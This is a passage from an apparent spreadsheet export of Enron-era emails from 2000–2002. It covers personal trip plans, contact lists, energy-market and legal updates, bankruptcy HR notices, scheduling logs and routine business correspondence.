Content-Type: text/plain; charset="us-ascii"_x000D_
X-Priority: 3 (Normal)_x000D_
X-MSMail-Priority: Normal_x000D_
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)_x000D_
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300_x000D_
Importance: Normal_x000D_
X-MIMETrack: Serialize by Router on ENE-MTA01/Enron(Release 5.0.3 (Intl)|21 _x000D_
March 2000) at08/17/2000 03:56:44 PM_x000D_
_x000D_
_x000D_
Pelt,_x000D_
_x000D_
We have made reservations for Fri. and Sat,  I didn't make yours but i_x000D_
would move quickly.  Would you like me to set up a tee time and massages_x000D_
for the girls?  I figured a 1 pm tee time?  Also what about tickets for the_x000D_
game itself.  Will you have access as years gone by or does the search need_x000D_
to begin?_x000D_
_x000D_
Mike_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Jonny Jones" &lt;jjones@jonesenergy.com&gt; on 08/10/2000 03:24:24 PM_x000D_
_x000D_
To:   &lt;Mike.McConnell@enron.com&gt;_x000D_
cc:_x000D_
Subject:  RE: Way to go!_x000D_
_x000D_
_x000D_
You are the first to be invited and there are no plans yet other than_x000D_
showing up.  Will you handle your own reservations?_x000D_
_x000D_
_x000D_
Content-Transfer-Encoding: 7bit_x000D_
From: &lt;Mike.McConnell@enron.com&gt;_x000D_
To: &lt;jjones@jonesenergy.com&gt;_x000D_
Subject: RE: Way to go!_x000D_
Date: Tue, 8 Aug 2000 11:15:57 -0500_x000D_
Message-ID: &lt;OF1DEFF401.53763C48-ON86256935.00592009@enron.com&gt;_x000D_
MIME-Version: 1.0_x000D_
Content-Type: text/plain;     charset="US-ASCII"_x000D_
X-Priority: 3 (Normal)_x000D_
X-MSMail-Priority: Normal_x000D_
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)_x000D_
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300_x000D_
Importance: Normal_x000D_
X-MIMETrack: Serialize by Router on ENE-MTA01/Enron(Release 5.0.3 (Intl)|21_x000D_
March 2000) at08/08/2000 11:14:46 AM_x000D_
_x000D_
_x000D_
Pup,_x000D_
_x000D_
That sounds great to us.  I take it you are not bringing the kids.  Have_x000D_
you already made reservations and a tee time?  Who else is included in_x000D_
this?  Also, am i interfering by inviting ourselves in your plans!_x000D_
_x000D_
Mike_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Jonny Jones" &lt;jjones@jonesenergy.com&gt; on 08/07/2000 03:27:44 PM_x000D_
_x000D_
To:   &lt;Mike.McConnell@enron.com&gt;_x000D_
cc:_x000D_
Subject:  RE: Way to go!_x000D_
_x000D_
_x000D_
We definitely are planning to go to Texas - O.U.  We are considering_x000D_
staying_x000D_
at the Four Seasons at Los Colinas.  Possibly a little golf and R &amp; R mixed_x000D_
in with the game.  It would be a bit out of the way.  We might go up as_x000D_
early as Friday morning to play golf that afternoon.  Let me know what you_x000D_
think._x000D_
_x000D_
_x000D_
Content-Transfer-Encoding: 7bit_x000D_
From: &lt;Mike.McConnell@enron.com&gt;_x000D_
To: &lt;jjones@jonesenergy.com&gt;_x000D_
Subject: Re: Way to go!_x000D_
Date: Mon, 7 Aug 2000 14:51:12 -0500_x000D_
Message-ID: &lt;OF685B92C1.DEA0D3D1-ON86256934.0040B016@enron.com&gt;_x000D_
MIME-Version: 1.0_x000D_
Content-Type: text/plain;     charset="us-ascii"_x000D_
X-Priority: 3 (Normal)_x000D_
X-MSMail-Priority: Normal_x000D_
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)_x000D_
Importance: Normal_x000D_
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300_x000D_
X-MIMETrack: Serialize by Router on ENE-MTA01/Enron(Release 5.0.3 (Intl)|21_x000D_
March 2000) at08/07/2000 02:50:00 PM_x000D_
_x000D_
_x000D_
Jonny,_x000D_
_x000D_
Thank you so much for the email and kind words.  I was very moved by it and_x000D_
you know I feel the same way.  I have become very reflective with the more_x000D_
"success" that I have been fortunate enough to receive.  I am so thankful_x000D_
and appreciative and although I have always been religious and spiritual,_x000D_
it has grown more deeply.  I see so many people that have lost their_x000D_
perspective and I pray that I will remain grounded and truly appreciate the_x000D_
blessings that our family has received.  Chris and I often discuss how we_x000D_
can help others and what can we do to really make a difference._x000D_
_x000D_
The Jones and the McConnells are truly very lucky.   Thanks, and give my_x000D_
love to your family._x000D_
_x000D_
Mike_x000D_
_x000D_
_x000D_
PS:  What about OU - Texas, do you have any ideas or plans already in the_x000D_
works?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Jonny Jones" &lt;jjones@jonesenergy.com&gt; on 08/02/2000 03:55:19 PM_x000D_
_x000D_
To:   "Mike McConnell (E-mail)" &lt;mike.mcconnell@enron.com&gt;_x000D_
cc:_x000D_
Subject:  Way to go!_x000D_
_x000D_
_x000D_
Sometimes we fail to stop and reflect on events which are of significance_x000D_
because we are so busy with our heads down accomplishing the things we_x000D_
strive for.  I hope you are taking a moment to reflect and enjoy the_x000D_
incredible accomplishments which you have achieved at such a young age._x000D_
You_x000D_
and I are two of the luckiest people in the world and must always remember_x000D_
to give back what we have been so fortunate to receive._x000D_
_x000D_
Congratulations and keep up the good work.  I am proud to call you my_x000D_
friend._x000D_
_x000D_
_x000D_
Jonny_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'ben.bergfelt@painewebber.com'})</t>
  </si>
  <si>
    <t>RE: Stammtisch Fichtenhof</t>
  </si>
  <si>
    <t xml:space="preserve">great pictures. have a great weekend. Ben_x000D_
_x000D_
-----Original Message-----_x000D_
From: Greg.Whalley@enron.com [SMTP:Greg.Whalley@enron.com]_x000D_
Sent: Friday, December 08, 2000 4:47 PM_x000D_
To: ben.bergfelt@painewebber.com_x000D_
Subject: Stammtisch Fichtenhof_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Greg Whalley/HOU/ECT on 12/08/2000_x000D_
03:46 PM ---------------------------_x000D_
_x000D_
_x000D_
"Robert Weiss" &lt;rweiss@grammer.de&gt; on 12/08/2000 01:21:14 PM_x000D_
_x000D_
Please respond to rweiss@grammer.de_x000D_
_x000D_
To:   greg.whalley@enron.com, webmaster@stadtbau-amberg.de_x000D_
cc:_x000D_
Subject:  Stammtisch Fichtenhof_x000D_
_x000D_
_x000D_
Greg,_x000D_
how are you?_x000D_
Enclosed find some pictures from our regular sunday-night-Stammtisch._x000D_
Can you do me a favour and send me the email-adresses of James, Ben,_x000D_
Glen, Mark and Ulrich. I want to invide them for the celebration of the_x000D_
25th aniversary of the Stammtisch FKK. As you know this will happen from_x000D_
20th of july until 22th of july 2001. I hope we see you there._x000D_
The email-adress on the top belongs to Hermann._x000D_
Servus_x000D_
Ferdl_x000D_
_x000D_
(Embedded image moved to file: pic03487.pcx)_x000D_
(Embedded image moved to file: pic29577.pcx)_x000D_
(Embedded image moved to file: pic14474.pcx)_x000D_
(Embedded image moved to file: pic02625.pcx)_x000D_
_x000D_
_x000D_
 &lt;&lt; File: pic03487.pcx &gt;&gt;  &lt;&lt; File: pic29577.pcx &gt;&gt;  &lt;&lt; File: pic14474.pcx _x000D_
&gt;&gt;  &lt;&lt; File: pic02625.pcx &gt;&gt; </t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 09:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EnPower Contacts</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kayne Coulter/HOU/ECT on 12/12/2000 05:24 _x000D_
PM ---------------------------_x000D_
From: Duong Luu on 12/12/2000 04:16 PM_x000D_
To: Kayne Coulter/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: EnPower Contacts_x000D_
_x000D_
fyi_x000D_
_x000D_
----- Forwarded by Duong Luu/HOU/ECT on 12/12/2000 04:16 PM -----_x000D_
_x000D_
	Will Smith_x000D_
	12/12/2000 03:35 PM_x000D_
		 _x000D_
		 To: Christopher Watts/NA/Enron@Enron, Benjamin Rogers/HOU/ECT@ECT, Alton _x000D_
Jackson/Corp/Enron@Enron, Keith Comeaux/Corp/Enron@Enron_x000D_
		 cc: Duong Luu/HOU/ECT@ECT_x000D_
		 Subject: EnPower Contacts_x000D_
_x000D_
Gentlemen,_x000D_
_x000D_
My name is Will Smith and I work with Duong Luu in EnPower IT as acting _x000D_
manager.  Duong asked that I send you a list of EnPower contact information..._x000D_
_x000D_
EnPower On Call_x000D_
Pager: 713-327-4523_x000D_
Mobile: 713-553-3758_x000D_
_x000D_
Myself:_x000D_
Pager: 713-284-9050_x000D_
Mobile: 713-417-4679_x000D_
_x000D_
Duong Luu:_x000D_
Pager: 713-284-3615_x000D_
Mobile: 713-857-7965_x000D_
_x000D_
Regards,_x000D_
Will_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Mar 2002 08:16:15 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pma@powermarketers.com'})</t>
  </si>
  <si>
    <t>Power Markets 2002-- Risk Transparency Workshop Added!</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;http://rs6.net/on.jsp?t=1010961753712.1010945481275&amp;o=http://ccprod.roving.com/roving/images/p1x1.gif&gt;_x000D_
  &lt;http://www.pmaconference.com/imagesemail/id000048/id00002.gif&gt;	_x000D_
Power Markets 2002: Risk and Reward_x000D_
April 17-18, 2002 ? Excalibur Hotel ? Las Vegas, NV_x000D_
Click Here to Download a Complete Conference Brochure &lt;http://www.pmaconference.com/markets2002.pdf&gt;	 _x000D_
  &lt;http://www.pmaconference.com/imagesemail/id000048/id00003.gif&gt;	_x000D_
We will see record numbers of new powerplants coming on line this year. New, much larger RTOs promise dramatic increases in liquidity. The Enron fallout will continue to force balance sheet improvements-- perhaps more mergers and acquisitions. Price volatility will continue, and risk management techniques will continue to be honed.	 _x000D_
  &lt;http://www.pmaconference.com/imagesemail/id000048/id00004.gif&gt;	_x000D_
Transmission and RTOs_x000D_
Representatives from PJM, Cal ISO and Midwest ISO on their respective regions. _x000D_
_x000D_
Insurance_x000D_
Scott Ettien from NCM, Lynda Clemmons from Element Re and Pat Toner Goudarzi from ACE, on Credit Insurance, Weather-risk Insurance and Innovative Insurance Products, respectively _x000D_
_x000D_
Exchanges_x000D_
Monte Simpson of InterContinental Exchange and Brad Leach of NYMEX on the growth in the use of exchanges. Credit_x000D_
Susan Abbott of Moody's on evolving credit standards in our industry _x000D_
_x000D_
Markets_x000D_
Kevin T. Howell President, Dominion Energy Clearinghouse, Dave Freeman of Panda and Mike Young of Aquila on the state of various aspects of the power markets. _x000D_
_x000D_
And More!_x000D_
Cabell Poindexter of Wyndham Mills on job prospects! John OBrien of Skipping Stone on the outlook for Transmission! Henwood on outlook for powerplant construction! Adrian Palmer of Caminus Corp on European Markets! _x000D_
Click Here to Download a Complete Conference Brochure &lt;http://www.pmaconference.com/markets2002.pdf&gt;	 _x000D_
  &lt;http://www.pmaconference.com/imagesemail/id000048/id00005.gif&gt;	_x000D_
Dominion Energy Clearinghouse_x000D_
Panda Energy_x000D_
Aquila, Inc._x000D_
Moody's Investor Services_x000D_
Skipping Stone_x000D_
NYMEX_x000D_
California ISO	 ICE _x000D_
NCM Americas_x000D_
Henwood Energy Services_x000D_
Element Re_x000D_
Caminus Corporation_x000D_
Wyndham Mills International 	_x000D_
  &lt;http://www.pmaconference.com/imagesemail/id000048/id00006.gif&gt;	_x000D_
On April 16, Scott Spiewak will be repeating his "Fundamentals of Power Marketing" preconference seminar. Essential for the new industry participant, it is also a valuable overview for the industry professional.	 _x000D_
  &lt;http://www.pmaconference.com/imagesemail/id000048/id2.gif&gt;	_x000D_
In this Workshop, Mark Griffith Director, Strategic Risk Analysis Henwood Energy Services, Inc will teach you how to apply this concept of Risk Transparency to your company's energy portfolio. This will include: _x000D_
_x000D_
An assessment of how portfolio risk is measured and communicated today_x000D_
What more is being demanded by the investment community_x000D_
Key risk metrics that can explain your companies risk position_x000D_
A detailed approach to measuring and communicating your company's portfolio risk, utilizing a case study that takes you through the vital steps of data collection, measurement and presentation of results_x000D_
_x000D_
  &lt;http://www.pmaconference.com/imagesemail/id000048/id00007.gif&gt;	_x000D_
Click Here to Download a Complete Conference Brochure &lt;http://www.pmaconference.com/markets2002.pdf&gt;	 _x000D_
This email was sent to shelley.corman@enron.com, by PowerMarketers.com &lt;http://rs6.net/tn.jsp?t=qtjiarn6.8rwxqqn6.9arrsqn6&amp;p=http%3A%2F%2Fwww.PowerMarketers.com&gt;. _x000D_
Visit our Subscription Center to edit &lt;http://ccprod.roving.com/roving/d.jsp?p=oo&amp;m=1000838503237&amp;ea=shelley.corman@enron.com&gt; your interests or unsubscribe &lt;http://ccprod.roving.com/roving/d.jsp?p=oo&amp;m=1000838503237&amp;ea=shelley.corman@enron.com&gt;. _x000D_
View our privacy policy &lt;http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp&gt;. _x000D_
_x000D_
Powered by _x000D_
Constant Contact &lt;http://www.constantcontact.com/index.jsp?cc=tccst&gt; </t>
  </si>
  <si>
    <t>Fri, 8 Jun 2001 10:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Dabhol -- A Brief Legal Update</t>
  </si>
  <si>
    <t>Gentlemen -_x000D_
_x000D_
A few brief updates:_x000D_
_x000D_
The hearing before the Bombay High Court regarding MERC jurisdiction is still _x000D_
on for Monday.  We are still not sure whether or not there will be anything _x000D_
substantive discussed at the hearing.  Gail Brownfeld and Christopher Walker _x000D_
are flying to Bombay just in case.  I just spoke with Jim McCartney and he is _x000D_
planning to try to attend as well.  _x000D_
_x000D_
There was no unified "message" from the lenders at the conclusion of the _x000D_
Singapore lenders meetings.  Our Finance guys are pretty confident that the _x000D_
offshore lenders will not cure the construction contract defaults this _x000D_
month.  The Indian banks may or may not cure.  If no one cures, the _x000D_
construction contracts will terminate in mid-June. _x000D_
_x000D_
We received a copy of a very interesting letter from the Chairman of MSEB to _x000D_
the India Central Electricity Authority and copied to GOM dated January 11, _x000D_
2001 (less than three weeks before we were first accused of misdeclaring).  _x000D_
The Chairman states:  _x000D_
_x000D_
"The high price of Dabhol power today was perhaps not accurately anticipated. _x000D_
. . .DPC Phase II trial runs are to commence shortly. . . .It is a fact that _x000D_
we have not been able to fully absorb even DPC phase I power at 90% PLF. . . _x000D_
.[O]nly on MSEB projections and certification DPC have invested a huge sum in _x000D_
Phase II.  Can we ask them to stop now?  Poor off-takes of DPC power are not _x000D_
just because of low demand, but also on account of the high price and the _x000D_
poor financial condition of MSEB.  We would be grateful for Government advice _x000D_
in the matter."_x000D_
_x000D_
It appears to me that the "advice" was to charge that DPC was misdeclaring _x000D_
its availability and to demand huge offsets as a result._x000D_
_x000D_
Bruce</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 06:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: 2/21 Checkout</t>
  </si>
  <si>
    <t xml:space="preserve">Whoo-hooo!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
02/21/2001 02:16 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: 2/21 Checkout_x000D_
_x000D_
_x000D_
Amerex West Checkout _x000D_
No errors- Clean Checkout_x000D_
_x000D_
_x000D_
Prebon West Checkout_x000D_
No errors-Clean Checkout_x000D_
_x000D_
_x000D_
Bloomberg Checkout_x000D_
No errors-Clean Checkout_x000D_
_x000D_
_x000D_
_x000D_
Thanks!!_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 08:17:45 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michael.tribolet@enron.com', 'lisa.mellencamp@enron.com'})</t>
  </si>
  <si>
    <t>FW: PG&amp;E</t>
  </si>
  <si>
    <t xml:space="preserve">Lisa -_x000D_
_x000D_
Something to think about.  Do we want to try and expand the issues to resolve the Settlement?_x000D_
_x000D_
Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Tycholiz, Barry  _x000D_
Sent:	Thursday, November 15, 2001 9:42 AM_x000D_
To:	Lawner, Leslie_x000D_
Cc:	Miller, Stephanie; Steffes, James D._x000D_
Subject:	RE: PG&amp;E_x000D_
_x000D_
Leslie, I presented a form of assignment to PG&amp;E as recently as 2 weeks ago( including other structures).. Generally speaking, they HATE the El Paso pipe because of it's flow risk and are not interested in discussing this with me until such time that EL Paso deliverability becomes more reliable. _x000D_
_x000D_
Having them take this pipe as a vehicle to help offset our bankruptcy claim works from an economics point of view ( assuming you can agree on values), but I think you will have a battle regaring the quality of service that they are going to get. Regardless, it is a an out of the money position for us and we could accomodate if they wish to discuss further. Have Lisa or Michael call me if they wish to discuss logistics around this asset._x000D_
_x000D_
Thanks, BT _x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lawner, Leslie  _x000D_
Sent:	Thursday, November 15, 2001 8:04 AM_x000D_
To:	Tycholiz, Barry; Dasovich, Jeff_x000D_
Cc:	Steffes, James D.; Cantrell, Rebecca W._x000D_
Subject:	PG&amp;E_x000D_
_x000D_
Steffes and I were just chatting and an idea came up, that we try to offer our El Paso capacity to PG&amp;E in their bankruptcy suit (in which a settlement is being negotiated) and perhaps we can, in turn, reduce our claim against PG&amp;E in that case.  Maybe this is already being done, but if not, it is a thought.  Lisa Mellencamp and Michael Tribolet are doing the bankruptcy case. </t>
  </si>
  <si>
    <t>Mon, 14 Jan 2002 17:36:44 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/14/02; HourAhead hour: 20;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/14/02; HourAhead hour: 20;  No ancillary schedules awarded.  No variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002011420.txt</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 19:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>California Update p.3; 5/29/01</t>
  </si>
  <si>
    <t xml:space="preserve">?	Hertzberg and Keeley announced that they are filing a petition with FERC to rehear the April 26th decision regarding price caps.  After going to D.C. and meeting with several FERC members, they decided to file for a rehearing.  Their filing asks that the order should be in affect around the clock instead of just during Stage 1, that the actual costs be tied closer to the pricing of the product, and anyone that exceeding the cost-based pricing system have a 100% penalty._x000D_
_x000D_
?	Hertzberg and Keeley had a press conference today at 1:30 PST.  Questions included the impact of today's ruling and how it would affect Plan B, Hertzberg replied he was not sure.    He also indicated that they support the Feinstein bill and if the lawsuit or the rehearing efforts do not work, legislation is the last chance for price caps.  Hertzberg also indicated that he was getting to the point where CA "may just say no to prices that are too high" (via buyer cartel)._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 22 Dec 2001 06:58:07 -0800 (PST)</t>
  </si>
  <si>
    <t>| notifications                                                            |_x000D_
+--------------------------------------------------------------------------+_x000D_
_x000D_
_x000D_
Bryson, Shawn added to Lake Austin Mighty Mullets's rosters, and Mitchell, Brian dropped._x000D_
If you have a cell phone or pager, you can get this information even sooner! Go to your league's web site and click "Options, Notifications" on the main toolbar to have notifications sent to your pager or phone, via text messaging._x000D_
_x000D_
Win a VIP Vegas Vacation! OR Win $600 CASH!_x000D_
http://www.sportsline.com/links/6/1/223/sffn1106v.cgi_x000D_
+--------------------------------------------------------------------------+_x000D_
|        Copyright 2001 Commissioner.COM Inc and SportsLine.com Inc.       |_x000D_
|  Your site is always at http://football.fantasy.sportsline.com/spoogers  |_x000D_
+--------------------------------------------------------------------------+_x000D_
_x000D_
FB10SP</t>
  </si>
  <si>
    <t>Tue, 11 Dec 2001 16:05:02 -0800 (PST)</t>
  </si>
  <si>
    <t>Addt'l Enron Q&amp;A Info</t>
  </si>
  <si>
    <t xml:space="preserve">You have many questions about how the bankruptcy will affect you.  The HR team is endeavoring to answer these questions. Due to simple logistics, answering each question individually is very difficult.  We are working to solve this issue by compiling answers to the important questions concerning employee benefits, expense payments and so on._x000D_
Answers to the most frequently-asked-questions will be posted on the corporate website at www.enron.com.  Click on Information for Enron Alumni Affected by Chapter 11 Filing &lt;/corp/alumni/&gt; . These Q&amp;A Facts are regularly updated when accurate and factual information is received.  In addition, we will have updates on 1-800-97-ENRON. (Option 9)_x000D_
If you have questions that have not been answered, please submit them to the following email address:  questions@enron.com _x000D_
A team of people will be answering these questions and posting answers as soon as possible._x000D_
_x000D_
An updated FAQ's was posted yesterday on www.home.enron.com   Attached below in a word document are the new FAQ's.  Please continue to view the corporate website for updates and new information.  _x000D_
_x000D_
Thank you for your patience. _x000D_
_x000D_
Julie Kearney_x000D_
503) 464-7404_x000D_
julie.kearney@enron.com_x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 17:19:11 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">This request has been pending your approval for  62 days.  Please click http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000057285&amp;Page=Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000057285_x000D_
Request Create Date : 8/30/01 5:59:30 PM_x000D_
Requested For       : erik.simpson@enron.com_x000D_
Resource Name       : Market Data Kobra NatGas_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 06:24:28 -0700 (PDT)</t>
  </si>
  <si>
    <t>Hub Park and Lend Agreement</t>
  </si>
  <si>
    <t>Daren,_x000D_
_x000D_
We are not receiving timely information from the Hub regarding our Park and=_x000D_
 Lend Agreement.  I have not received an update since Tues or Wed of last w=_x000D_
eek.   Mike has been phoning them furiously for information and has been to=_x000D_
ld that they don't have it, or it will be ready later.  Per GISB, final sch=_x000D_
eduled numbers on EPNG, NNG, and TW are reported at 9:00 am the following d=_x000D_
ay (ie. Sunday final will be out at 9 AM on Mon.).  Prior to the transition=_x000D_
 from PG&amp;E, we received our balance by 9:15 or 9:30 AM.  I realize that the=_x000D_
 transition has been difficult, they are never a cake walk, however, this t=_x000D_
ype of information is crucial.  Further, they have not provided any final n=_x000D_
umbers for the month of April, we should at least be able to receive a "bes=_x000D_
t available" number, and the Interstate Pipes, due to GISB, have final sche=_x000D_
duled numbers available on the first of the month.  I submit that ENA shoul=_x000D_
d not be held liable for payment of the $0.03/day rate, as we have not rece=_x000D_
ived the information we need to balance the agreement.  If EPGT plans to ad=_x000D_
minister fees, then balance information should be communicated on a timely =_x000D_
basis.  We may want to check the terms of the agreement, and/or negotiate a=_x000D_
 reduced rate for the month of May._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Mary</t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 09:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'drew.tingleaf@enron.com', 'mitch.robinson@enron.com', 'doug.gilbert-smith@enron.com', 'ron.mcnamara@enron.com', 'bruce.sukaly@enron.com', 'smith.day@enron.com', 'clint.dean@enron.com', 'michelle.parks@enron.com', 'david.portz@enron.com', 'lance.cunningham@enron.com', 'lloyd.will@enron.com', 'madhup.kumar@enron.com', 'juan.padron@enron.com', 'juan.hernandez@enron.com', 'thresa.allen@enron.com', 'christopher.ahn@enron.com', 'robin.kittel@enron.com'})</t>
  </si>
  <si>
    <t>ERCOT Market Guide</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Mike Curry/HOU/ECT on 11/20/2000 05:07 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Coon, Patrick" &lt;pcoon@ercot-iso.com&gt; on 11/14/2000 05:16:07 PM_x000D_
To: 1 Entire email container &lt;sendtoall@ercot.com&gt;_x000D_
cc: "Hailu, Ted" &lt;THailu@ercot.com&gt; _x000D_
Subject: ERCOT Market Guide_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
This is to announce the publication of the ERCOT_x000D_
Market Guide. The guide is a comprehensive_x000D_
introduction to the competitive electric market_x000D_
from a non-technical viewpoint. It is designed for_x000D_
a general audience within your organization to_x000D_
introduce the general concepts of the deregulated_x000D_
market, the market participant and their roles,_x000D_
and the rules of the competitive wholesale and_x000D_
retail electric market. It is our hope that this_x000D_
document will assist you in communicating basic_x000D_
market concepts to the team of people working on_x000D_
the successful launch of your efforts to_x000D_
participate in the ERCOT market. The document is_x000D_
also available for download at the ERCOT program_x000D_
website. The document will be revised periodically_x000D_
to incorporate any changes to market rules and_x000D_
processes and any comments received. Subsequent_x000D_
revisions will be posted to the program website._x000D_
_x000D_
http://www.texaschoiceprogram.com/documentation/Ma_x000D_
rkPartDocs/ERCOT_Market_Guide.pdf_x000D_
_x000D_
If you have any questions or would like to provide_x000D_
feedback to the Market Guide document, please call_x000D_
Patrick Coon at (512)248-3911 or e-mail Patrick at_x000D_
pcoon@ercot.com._x000D_
_x000D_
_x000D_
 &lt;&lt;ERCOT Market Guide(v1[1].1p).zip&gt;&gt;_x000D_
_x000D_
 - ERCOT Market Guide(v1[1].1p).zip_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'creedon@rff.org'})</t>
  </si>
  <si>
    <t>frozenset({'hhabicht@getf.org', 'itsinvestments@bigfoot.com', 'darius.gaskins@verizon.net', 'karl@beijer.kva.se', 'pisano@scag.ca.gov', 'jmaddy@goparks.org', 'vtschinkel@landersandparsons.com', 'klay@enron.com', 'frank@cmabiccw.com', 'estrohbehn@mdbe.com', 'cabbott@ceg.com', 'rsant@aesc.com', 'jstiglitz@brookings.edu', 'swpercy@ppco.com', 'jfogjr@juno.com'})</t>
  </si>
  <si>
    <t>Breakfast in New York</t>
  </si>
  <si>
    <t>On Feb. 27, 2001 RFF Board member Dod Fraser will host a breakfast in New_x000D_
York to introduce us to potential donors (corporate, foundation and_x000D_
individual) and Board members in the area.  If you have names of people you_x000D_
would like to invite to this event, please send them to me (with contact_x000D_
information) at your earliest convenience.  We appreciate your assistance in_x000D_
helping us expand our circle of friends.  I look forward to hearing from_x000D_
you!</t>
  </si>
  <si>
    <t>Fri, 19 Jan 2001 08:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>agreement with EOL</t>
  </si>
  <si>
    <t xml:space="preserve">Just wanted to know I am working on your behalf..._x000D_
I'll let you know what Shelley says.  _x000D_
I really feel a need to keep the EOL guys honest, so a full-fledged agreement _x000D_
would probably not be overkill.  But in reality, a term sheet is probably _x000D_
almost as good._x000D_
---------------------- Forwarded by Susan Scott/ET&amp;S/Enron on 01/19/2001 _x000D_
04:13 PM ---------------------------_x000D_
_x000D_
_x000D_
Susan Scott_x000D_
01/19/2001 04:08 PM_x000D_
To: Shelley Corman_x000D_
cc: Tony Pryor/ET&amp;S/Enron@ENRON, Frazier King/FGT/Enron@ENRON _x000D_
_x000D_
Subject: agreement with EOL_x000D_
_x000D_
Shelley, I understand that there is a concern about TW having a written _x000D_
agreement with EOL without the other two pipelines having an agreement._x000D_
_x000D_
From my perspective, TW needs an agreement because TW is uniquely situated.  _x000D_
Here's why._x000D_
_x000D_
- My understanding is that TW is the only pipeline that has been asked to pay _x000D_
a fee._x000D_
_x000D_
- The developers Michelle Lokay and I have been talking to seem very _x000D_
uncertain about exactly what the fee covers._x000D_
_x000D_
-  $50,000 is a lot of money to Transwestern._x000D_
_x000D_
-   Transwestern has a recent history of not getting what it thought it had _x000D_
bargained for from affiliated companies, and would appreciate our trying to _x000D_
protect them._x000D_
_x000D_
I am not trying to create extra work for anyone.  I am just a little confused _x000D_
about why a contract for TW would necessitate a contract for the other 2 _x000D_
companies.  If you could help me understand, I would appreciate it.  _x000D_
_x000D_
If the consensus is that we feel strongly that TW should not have a written _x000D_
agreement, then I would at least insist on a detailed letter of intent or _x000D_
term sheet.  This would force both sides to think ahead about what is _x000D_
expected.  (And, as a practical matter, it's highly unlikely that we're going _x000D_
to take legal action for breach of contract against an affiliate...)_x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Jun 2001 08:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Final 6/18/01 Gas Violations</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the Enron Americas GasTrading violation memos for  Maturity Gap _x000D_
Risk and VaR for June 18, 2001.  The Office of the Chairman for Enron _x000D_
Americas is responsible for printing out a hard copy of this memo, signing it _x000D_
and returning the hard copy to Chris Abel at 3155a, who will forward it to _x000D_
RAC to obtain their signature. _x000D_
_x000D_
Thank You_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 04:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: ENA/NorthWestern: Certificate of Amendment &amp; Closing Checklis t</t>
  </si>
  <si>
    <t xml:space="preserve">I just like to make Margie work._x000D_
_x000D_
So do you think they'll fire Dierker?  I guess you heard Lima is heading to _x000D_
the bullpen._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Reuter, Marisa" &lt;MReuter@KSLAW.com&gt; on 05/31/2001 11:42:13 AM_x000D_
To: "'Kay.Mann@enron.com'" &lt;Kay.Mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: ENA/NorthWestern: Certificate of Amendment &amp; Closing Checklis t_x000D_
_x000D_
Will do.  For the moment, the only document that is outstanding is the joint_x000D_
letter instruction to Citibank regarding the disbursement of the escrow_x000D_
funds.  I have a template, but I'll go ahead and let them take the lead._x000D_
_x000D_
